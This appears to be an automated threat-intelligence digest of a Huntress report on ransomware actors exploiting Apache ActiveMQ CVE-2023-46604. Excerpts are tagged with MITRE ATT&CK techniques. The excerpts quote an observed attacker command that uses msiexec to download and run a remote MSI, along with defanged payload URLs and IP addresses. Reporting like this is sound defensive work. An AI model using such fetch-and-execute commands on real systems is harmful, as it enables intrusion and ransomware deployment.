"Critical Vuln: Apache ActiveMQ CVE-2023-46604 Exploited | Huntress. A partner recently deployed Huntress agents on October 30, 2023, after experiencing a “HelloKitty” ransomware attack on October 27. This ransomware attack followed closely with what was described by Rapid7 …"
T1190 Exploit Public-Facing Application (61%)
"ActiveMQ via the OpenWire protocol, typically running on port 61616. - By sending a crafted OpenWire packet, the attacker prompts the system to unmarshal a class they control. This action triggers the vulnerable server to fetch and load a class configuration XML file from a remot…"
T1218.007 Msiexec (51%)
".]125/m4.png and http://172.245.16[.]125/m2.png. However, neither package appeared to install successfully. One of the packages failed to install due to an error with C:\Windows\Installer\msib9e7.tmp, and the other completed, but C:\Windows\Installer…"
T1059.001 PowerShell (43%)
"agent_w.exe was quarantined, analysis of the retrieved file indicates that it attempts to connect to 137.175.17[.]172. On November 2, the Huntress team was alerted to multiple endpoints executing curl requests via the URL hxxp://27.102.128[.]152:8098/bit[.]…"
T1218.007 Msiexec (33%)
"Figure 3, appears as follows: C:\mrx\apache\activemq\bin\win64\wrapper.exe -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe -> “cmd.exe /c msiexec /q /i http://4.216.93[.]211:5981/runtimebroker.msi” The comm…"
Summary
CVE-2023-46604 is a critical remote code execution vulnerability in Apache ActiveMQ. Patch now to avoid any potential adversary exploitation.